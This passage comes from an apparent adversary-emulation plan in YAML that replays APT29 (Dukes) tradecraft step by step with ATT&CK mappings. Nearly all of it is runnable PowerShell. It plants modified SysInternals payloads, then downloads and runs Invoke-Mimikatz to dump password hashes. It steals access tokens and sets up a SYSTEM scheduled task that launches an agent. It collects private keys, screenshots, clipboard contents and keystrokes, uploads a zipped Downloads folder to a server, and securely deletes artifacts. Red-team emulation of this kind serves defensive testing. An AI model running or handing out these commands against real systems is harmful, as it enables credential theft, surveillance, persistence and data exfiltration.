{ - write-host "Error expanding files to #{profile_user}\Downloads"; - exit 1; - } - - $dir_exists=Test-Path -path "C:\Program Files\SysInternalsSuite"; - if ($dir_exists -eq $true) { - write-host "[*] SysInternalsSuite folder exists within \"C:\Program Files\", copying over payloads then removing folder from Downloads."; - Move-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - Move-Item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - } else { - mkdir "C:\Program Files\SysInternalsSuite"; - Copy-Item -Path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - Copy-Item -Path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - } - - if (test-path -path "SysInternalsSuite.zip") { - Remove-Item -path "filesystem::SysInternalsSuite.zip" -force; - } - - if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" ) { - remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -force; - } - - if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite") { - remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -recurse -force; - } - - if (test-path -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite") { - Remove-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -recurse -force; - } - - Set-Location -path "C:\Program Files\SysInternalsSuite"; - if ($?) { - gci; - write-host "[*] Successfully planted files" - } else { - write-host "[!] Error downloading and planting modified system tools." 
- } - - payloads: - - Modified-SysInternalsSuite.zip - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - executors: - - name: powershell - command: | - iwr -uri "https://download.sysinternals.com/files/SysinternalsSuite.zip" -outfile SysInternalsSuite.zip; - Expand-Archive -Path SysInternalsSuite.zip -DestinationPath "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -Force; - - if (! $?) { - write-host "Error moving files to #{profile_user}\Downloads"; - exit 1; - } - - Move-Item Modified-SysInternalsSuite.zip "C:\Users\#{profile_user}\Downloads" -Force; - Expand-Archive -LiteralPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -DestinationPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -Force; - - if (! $?) { - write-host "Error expanding files to #{profile_user}\Downloads"; - exit 1; - } - - $dir_exists=Test-Path -path "C:\Program Files\SysInternalsSuite"; - if ($dir_exists -eq $true) { - write-host "[*] SysInternalsSuite folder exists within \"C:\Program Files\", copying over payloads then removing folder from Downloads."; - Move-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - Move-Item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - } else { - mkdir "C:\Program Files\SysInternalsSuite"; - Copy-Item -Path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - Copy-Item -Path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - } - - if (test-path -path "SysInternalsSuite.zip") { - Remove-Item -path "filesystem::SysInternalsSuite.zip" -force; - } - - if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" ) { - 
remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -force; - } - - if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite") { - remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -recurse -force; - } - - if (test-path -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite") { - Remove-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -recurse -force; - } - - Set-Location -path "C:\Program Files\SysInternalsSuite"; - if ($?) { - gci; - write-host "[*] Successfully planted files" - } else { - write-host "[!] Error downloading and planting modified system tools." - } - -- id: 59592c35-8207-4896-8d8b-36ad4600245d - name: Remote System Discovery - description: The net utility is executed via cmd to enumerate DCs within the domain - tactic: discovery - technique: - attack_id: T1018 - name: "Remote System Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "4.A.2" - platforms: - windows: - psh,pwsh: - command: | - cmd.exe /c net group "Domain Controllers" /domain - - executors: - - name: powershell - command: | - cmd.exe /c net group "Domain Controllers" /domain - -- id: 24ed020e-4730-4000-b6b4-6b5d3e95314f - name: Remote System Discovery - description: The net utility is executed via cmd to enumerate hosts within the domain. 
- tactic: discovery - technique: - attack_id: T1018 - name: "Remote System Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "4.A.3" - platforms: - windows: - psh,pwsh: - command: | - cmd.exe /c net group "Domain Computers" /domain - - executors: - - name: powershell - command: | - cmd.exe /c net group "Domain Computers" /domain - -- id: 5f4263c4-7ff1-4098-b5f5-f41faa31cf5b - name: System Network Configuration Discovery - description: The netsh utility is executed via cmd to enumerate local firewall configuration information. - tactic: discovery - technique: - attack_id: T1016 - name: "System Network Configuration Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "4.B.1" - platforms: - windows: - cmd: - command: | - netsh advfirewall show allprofiles - - executors: - - name: command_prompt - command: | - netsh advfirewall show allprofiles - -- id: 646be6c9-f27a-4f5f-be5d-b8a0317e215f - name: Process Discovery - description: List running process on the machine via PowerShell. 
- tactic: discovery - technique: - attack_id: T1057 - name: "Process Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "4.B.2" - platforms: - windows: - psh,pwsh: - command: | - $ps = get-process; - write-output $ps; - - executors: - - name: powershell - command: | - $ps = get-process; - write-output $ps; - -- id: 9b5b5aec-32ff-4d74-8555-727b50ab15f6 - name: Artifact Cleanup - Delete Files - description: Cleanup files related to Operation - tactic: defensive-evasion - technique: - attack_id: T1070.004 - name: "Indicator Removal on Host: File Deletion" - cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" - procedure_group: procedure_def_evasion - procedure_step: "4.B.3" - platforms: - windows: - psh,pwsh: - command: | - if (! $(test-path -path "C:\Program Files\SysInternalsSuite";)) { - write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; - exit 1; - } - Set-Location -path "C:\Program Files\SysInternalsSuite"; - gci $env:userprofile\Desktop; - .\sdelete64.exe /accepteula "$env:USERPROFILE\Desktop\‮cod.3aka3.scr"; - .\sdelete64.exe /accepteula "$env:APPDATA\Draft.Zip"; - .\sdelete64.exe /accepteula "$env:USERPROFILE\Downloads\SysInternalsSuite.zip"; - - executors: - - name: powershell - command: | - if (! $(test-path -path "C:\Program Files\SysInternalsSuite";)) { - write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. 
Execution has stopped."; - exit 1; - } - Set-Location -path "C:\Program Files\SysInternalsSuite"; - gci $env:userprofile\Desktop; - .\sdelete64.exe /accepteula "$env:USERPROFILE\Desktop\‮cod.3aka3.scr"; - .\sdelete64.exe /accepteula "$env:APPDATA\Draft.Zip"; - .\sdelete64.exe /accepteula "$env:USERPROFILE\Downloads\SysInternalsSuite.zip"; - -- id: 6f1f4768-7099-45d2-a858-b49dc792234e - name: Loading Stage-2 & Performing Discovery - description: Load Stage-2 from Modified Sysinternals Toolset - tactic: discovery - technique: - attack_id: T1082 - name: "System Information Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "4.C.1" - platforms: - windows: - psh,pwsh: - command: | - if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { - write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysInternalsSuite"; - if (!(test-path ".\readme.ps1")) { - Move-Item .\readme.txt readme.ps1 -Force; - } - . .\readme.ps1; - Invoke-Discovery; - - executors: - - name: powershell - command: | - if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { - write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysInternalsSuite"; - if (!(test-path ".\readme.ps1")) { - Move-Item .\readme.txt readme.ps1 -Force; - } - . .\readme.ps1; - Invoke-Discovery; - -- id: ba0b398d-91b8-490a-bed2-f959afa8e1aa - name: 4.C.2 - System Network Connections Discovery (T1049) - description: The netstat utility is executed via cmd to enumerate local active network connections. 
- tactic: discovery - technique: - attack_id: T1049 - name: "System Network Connections Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "4.C.2" - platforms: - windows: - cmd: - command: | - netstat -ano - - executors: - - name: command_prompt - command: | - netstat -ano - -# Step 5 - Persistence - -- id: effbedc1-1bc8-4a75-9395-980559700008 - name: Credential Dumping using Process Injection - description: Mimikatz lsadump::sam is executed via Invoke-Mimikatz to dump hashes via process injection into LSASS. - tactic: credential-access - technique: - attack_id: T1003 - name: "Credential Dumping" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_cred_access - procedure_step: "5.A.1" - platforms: - windows: - psh,pwsh: - command: | - [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }; - $web = (New-Object System.Net.WebClient); - $result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); - iex $result; - function hashdump - { - Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit" - }; - hashdump; - - executors: - - name: powershell - command: | - [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }; - $web = (New-Object System.Net.WebClient); - $result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); - iex $result; - function hashdump - { - Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit" - }; - hashdump; - -- id: 9c75155e-21ab-4471-af16-45f3795a313c - name: Persistent Service 1 - description: Leverage modified Sysinternals - tactic: persistence - technique: - 
attack_id: T1547.009 - name: "Boot or Logon Autostart Execution: Shortcut Modification" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_persistence - procedure_step: "5.A.2" - platforms: - windows: - psh,pwsh: - command: | - Set-Location -path "C:\Program Files\SysinternalsSuite"; - if (get-service -name "javamtsup" -ErrorAction SilentlyContinue) { - write-host "[*] Service already exists...Not running persistence step-1"; - exit 1; - } - - if (Test-Path -path "readme.ps1") { - . .\readme.ps1; - Invoke-Persistence -PersistStep 1; - write-host "[+] Persistence 1 invoked."; - exit 0; - - } else { - write-host "[!] readme.ps1 not found."; - exit 1; - } - - executors: - - name: powershell - command: | - Set-Location -path "C:\Program Files\SysinternalsSuite"; - if (get-service -name "javamtsup" -ErrorAction SilentlyContinue) { - write-host "[*] Service already exists...Not running persistence step-1"; - exit 1; - } - - if (Test-Path -path "readme.ps1") { - . .\readme.ps1; - Invoke-Persistence -PersistStep 1; - write-host "[+] Persistence 1 invoked."; - exit 0; - - } else { - write-host "[!] readme.ps1 not found."; - exit 1; - } - -- id: 45f18b58-c14f-4b61-a3da-41b67af21429 - name: Persistent Service 2 - description: Leverage modified Sysinternals - tactic: persistence - technique: - attack_id: T1547.009 - name: "Boot or Logon Autostart Execution: Shortcut Modification" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_persistence - procedure_step: "5.B.1" - platforms: - windows: - psh,pwsh: - command: | - Set-Location -path "C:\Program Files\SysinternalsSuite"; - if (Test-Path -path "readme.ps1") { - . .\readme.ps1; - Invoke-Persistence -PersistStep 2; - write-host "[+] Persistence 2 invoked."; - - } else { - write-host "[!] 
readme.ps1 not found."; - return 1; - } - - executors: - - name: powershell - command: | - Set-Location -path "C:\Program Files\SysinternalsSuite"; - if (Test-Path -path "readme.ps1") { - . .\readme.ps1; - Invoke-Persistence -PersistStep 2; - write-host "[+] Persistence 2 invoked."; - - } else { - write-host "[!] readme.ps1 not found."; - return 1; - } - -- id: 03afada1-1714-408f-bde5-f528b91dc89d - name: Access Token Manipulation - description: A token theft script was executed to steal and assume the token of another user’s existing process, changing the user context of the process. - tactic: defensive-evasion - technique: - attack_id: T1134 - name: "Access Token Manipulation" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_def_evasion - procedure_step: "5.B.2" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - payloads: - - StealToken.ps1 - - sandcat.go-windows - - input_arguments: - remote.file.share: - description: IP or Hostname of remote file share - type: string - default: 192.0.2.10 - - server: - description: IP or Hostname of server - type: string - default: 127.0.0.1 - - executors: - - name: powershell - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - 
CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - -# Step 6 - Credential Access - -- id: e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d - name: Credentials In Files- Chrome - description: Obtain credentials from Chrome Dumper - tactic: credential-access - technique: - attack_id: T1003 - name: "Credential Dumping" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_cred_access - procedure_step: "6.A.1" - platforms: - windows: - psh,pwsh: - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysinternalsSuite"; - ./accesschk.exe -accepteula .; - - executors: - - name: powershell - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysinternalsSuite"; - ./accesschk.exe -accepteula .; - -- id: 1b9e018d-986d-42d9-bb8b-0e104e98ce9c - name: Query Registry - description: A token theft script was executed to steal and assume the token of another user’s existing process, changing the user context of the process. 
- tactic: defensive-evasion - technique: - attack_id: T1134 - name: "Access Token Manipulation" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_def_evasion - procedure_step: "6.A.2" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - payloads: - - StealToken.ps1 - - sandcat.go-windows - - input_arguments: - remote.file.share: - description: IP or Hostname of remote file share - type: string - default: 192.0.2.20 - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - -- id: c4f4b13c-87b6-498c-b814-93570173068c - name: Credentials In Files (T1081) - Private Keys Extraction - description: Obtain credentials via Custom PowerShell - tactic: credential-access - technique: - attack_id: T1552.004 - name: "Unsecured Credentials: Private Keys" 
- cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_cred_access - procedure_step: "6.B" - platforms: - windows: - psh,pwsh: - command: | - Import-PfxCertificate -Exportable -FilePath ".\dmevals.local.pfx" -CertStoreLocation Cert:\LocalMachine\My; - - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\readme.ps1; - Get-PrivateKeys; - if ($? -eq $True) { - write-host "[+] Successfully executed private key collection script."; - exit 0; - } else { - write-host "[!] Error, could not execution Get-PrivateKeys."; - exit 1; - } - payloads: - - dmevals.local.pfx - - executors: - - name: powershell - command: | - Import-PfxCertificate -Exportable -FilePath ".\dmevals.local.pfx" -CertStoreLocation Cert:\LocalMachine\My; - - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\readme.ps1; - Get-PrivateKeys; - if ($? -eq $True) { - write-host "[+] Successfully executed private key collection script."; - exit 0; - } else { - write-host "[!] 
Error, could not execution Get-PrivateKeys."; - exit 1; - } - -# Step 7 - Collection and Exfiltration -- id: a4b14c10-49aa-4ae4-b165-d5a37364fe62 - name: Staging files for PowerShell module imports - description: Renaming psversion.txt to psversion.txt to be imported - tactic: defensive-evasion - technique: - attack_id: T1036.005 - name: "Masquerading: Match Legitimate Name or Location" - cti_source: "https://securelist.com/the-cozyduke-apt/69731/" - procedure_group: procedure_def_evasion - procedure_step: "7.A.1" - platforms: - windows: - psh,pwsh: - command: | - if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { - write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysInternalsSuite"; - if (test-path -path ".\psversion.txt" ) { - move-item .\psversion.txt psversion.ps1 -Force; - } - write-host "[+] File psversion.ps1 staged to be imported." - - executors: - - name: powershell - command: | - if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { - write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysInternalsSuite"; - if (test-path -path ".\psversion.txt" ) { - move-item .\psversion.txt psversion.ps1 -Force; - } - write-host "[+] File psversion.ps1 staged to be imported." - -- id: a81ea4ad-bc9f-49a7-82d4-4466df641487 - name: Screen Capturing - description: Load custom PowerShell module and take screenshots. - tactic: collection - technique: - attack_id: T1113 - name: "Screen Capture" - cti_source: "https://securelist.com/the-cozyduke-apt/69731/" - procedure_group: procedure_collection - procedure_step: "7.A.2" - platforms: - windows: - psh,pwsh: - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite\psversion.ps1";)) { - write-host "[!] The path C:\Program Files\SysinternalsSuite\psversion.ps1 does not exist. 
Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\psversion.ps1; - Invoke-ScreenCapture; Start-Sleep -Seconds 3; View-Job -JobName "Screenshot"; - - executors: - - name: powershell - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite\psversion.ps1";)) { - write-host "[!] The path C:\Program Files\SysinternalsSuite\psversion.ps1 does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\psversion.ps1; - Invoke-ScreenCapture; Start-Sleep -Seconds 3; View-Job -JobName "Screenshot"; - -- id: ee4c2eab-be57-434c-a32c-14b77360301a - name: Automated Collection (T1119) - Clipboard (T1115) - description: Get contents of clipboard - tactic: collection - technique: - attack_id: T1115 - name: "Clipboard Data" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_collection - procedure_step: "7.A.3" - platforms: - windows: - psh,pwsh: - command: | - $clip_data=get-clipboard; - if ($clip_data.Length -gt 0) { - write-host "[+] Clipboard data obtained!\n"; - write-host $clip_data; - } else { - write-host "[!] No clipboard data available!\n"; - } - - executors: - - name: powershell - command: | - $clip_data=get-clipboard; - if ($clip_data.Length -gt 0) { - write-host "[+] Clipboard data obtained!\n"; - write-host $clip_data; - } else { - write-host "[!] No clipboard data available!\n"; - } - -- id: db28f68d-e8b8-46e6-b680-642570d4b257 - name: Automated Collection (T1119) - Input Capture (T1417) - description: Load custom PowerShell module, and grab keystrokes for 15 seconds. 
- tactic: collection - technique: - attack_id: T1056.001 - name: "Input Capture: Keylogging" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_collection - procedure_step: "7.A.4" - platforms: - windows: - psh,pwsh: - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\psversion.ps1; - Get-Keystrokes; - Start-Sleep -Seconds 15; - View-Job -JobName "Keystrokes"; - - executors: - - name: powershell - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\psversion.ps1; - Get-Keystrokes; - Start-Sleep -Seconds 15; - View-Job -JobName "Keystrokes"; - -- id: a612311d-a802-48da-bb7f-88a4b9dd7a24 - name: Data from staged file (T1074) and Exfiltration over C2 Channel (T1041) - description: Compress all data within Download directory and exfiltrate the results. - tactic: exfiltration - technique: - attack_id: T1041 - name: "Exfiltration Over C2 Channel" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_exfiltration - procedure_step: "7.B.1" - platforms: - windows: - psh,pwsh: - command: | - Write-Host "[*] Compressing all the things in download dir"; - Compress-Archive -Path "C:\Users\#{profile_user}\Downloads\*.*" -DestinationPath "$env:APPDATA\OfficeSupplies.zip"; - - Import-Module .\upload.ps1 -Verbose -Force; - Invoke-MultipartFormDataUpload -InFile "$env:APPDATA\OfficeSupplies.zip" -Uri "#{server}/file/upload"; - if ($?) 
{ - write-host "[+] Data exfil of download directory completed!"; - } else { - write-host "[!] Data exfil failed!"; - } - - payloads: - - upload.ps1 - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Write-Host "[*] Compressing all the things in download dir"; - Compress-Archive -Path "C:\Users\#{profile_user}\Downloads\*.*" -DestinationPath "$env:APPDATA\OfficeSupplies.zip"; - - Import-Module .\upload.ps1 -Verbose -Force; - Invoke-MultipartFormDataUpload -InFile "$env:APPDATA\OfficeSupplies.zip" -Uri "#{server}/file/upload"; - if ($?) { - write-host "[+] Data exfil of download directory completed!"; - } else { - write-host "[!] Data exfil failed!"; - } - -- id: 9b518cfb-125f-466e-872b-4f8171773ce5 - name: Remote File Copy (T1105) - description: A token theft script was executed to steal and assume the token of another user’s existing process, changing the user context of the process. 
- tactic: defensive-evasion - technique: - attack_id: T1134.001 - name: "Access Token Manipulation: Token Impersonation/Theft" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_def_evasion - procedure_step: "7.B.2" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - payloads: - - StealToken.ps1 - - sandcat.go-windows - - input_arguments: - remote.file.share: - description: IP or Hostname of remote file share - type: string - default: 192.0.2.20 - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - -- id: 6b90da47-13d0-48fc-8f07-0a1e6d5d876e - name: Scheduled Tasks (T1053) - description: A token theft script was executed to steal and assume the token of another user’s existing process, changing the user context of the process. 
- tactic: defensive-evasion - technique: - attack_id: T1134.001 - name: "Access Token Manipulation: Token Impersonation/Theft" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_def_evasion - procedure_step: "7.C.1" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - payloads: - - StealToken.ps1 - - sandcat.go-windows - - input_arguments: - remote.file.share: - description: IP or Hostname of remote file share - type: string - default: 192.0.2.20 - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - -# Step 8 - Lateral Movement - -- id: 95564347-e77a-4a89-b08f-dcafa5468f2c - name: Remote System Discovery (T1018) - description: Custom PowerShell script to perform AD triage for domain bound computers. 
